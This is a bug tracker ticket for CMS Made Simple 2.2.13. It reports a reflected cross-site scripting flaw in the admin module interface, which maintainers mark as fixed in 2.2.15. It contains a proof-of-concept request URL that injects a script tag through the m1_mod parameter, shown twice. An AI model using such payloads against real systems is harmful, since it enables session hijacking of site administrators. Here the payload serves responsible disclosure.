CMS MADE SIMPLE FORGE

CMS Made Simple Core

 

[#12291] Reflected Cross site scripting

avatar
Created By: Jyoti Raval (jenyraval)
Date Submitted: Mon Apr 13 02:33:52 -0400 2020

Assigned To: Ruud van der Velden (ruudvdvelden)
Version: 2.2.13
CMSMS Version: 2.2.13
Severity: Major
Resolution: Fixed
State: Closed
Summary:
Reflected Cross site scripting
Detailed Description:
Whenever end user fires below request:

http://yourip/cmsms_2.2.13/admin/moduleinterface.php?mact=ModuleManager%2cm1_%2clocal_uninstall%2c0&__c=e3e96bbe8131785df6a&m1_mod=AdminSearchu8r90%3cscript%3ealert(1)%3c%2fscript%3ez6a0c

Application will first redirect to login. But once we login again, we will see
that script is executed on the browser and vulnerability is exploited.

Do let me  know if step-by-step screenshots are needed.


History

Comments
avatar
Date: 2020-09-18 11:57
Posted By: Ruud van der Velden (ruudvdvelden)

Fixed in svn (2.2.15)
Thank you for reporting.
      
avatar
Date: 2020-11-03 14:24
Posted By: Rolf (rolf1)

CMSMS 2.2.15 has been released
      
Updates

Updated: 2020-11-03 14:24
state: Open => Closed

Updated: 2020-09-18 11:57
resolution_id: 5 => 7
assigned_to_id: 100 => 18365

Updated: 2020-04-13 02:47
description: Whenever end user fires below request: http://yourip/cmsms_2.2.14/admin/moduleinterface.php?mact=ModuleManager%2cm1_%2clocal_uninstall%2c0&__c=e3e96bbe8131785df6a&m1_mod=AdminSearchu8r90%3cscript%3ealert(1)%3c%2fscript%3ez6a0c Application will first => Whenever end user fires below request: http://yourip/cmsms_2.2.13/admin/moduleinterface.php?mact=ModuleManager%2cm1_%2clocal_uninstall%2c0&__c=e3e96bbe8131785df6a&m1_mod=AdminSearchu8r90%3cscript%3ealert(1)%3c%2fscript%3ez6a0c Application will first

Updated: 2020-04-13 02:47
version_id: 31720 => 31698
resolution_id: => 5
cmsms_version_id: 31720 => 31698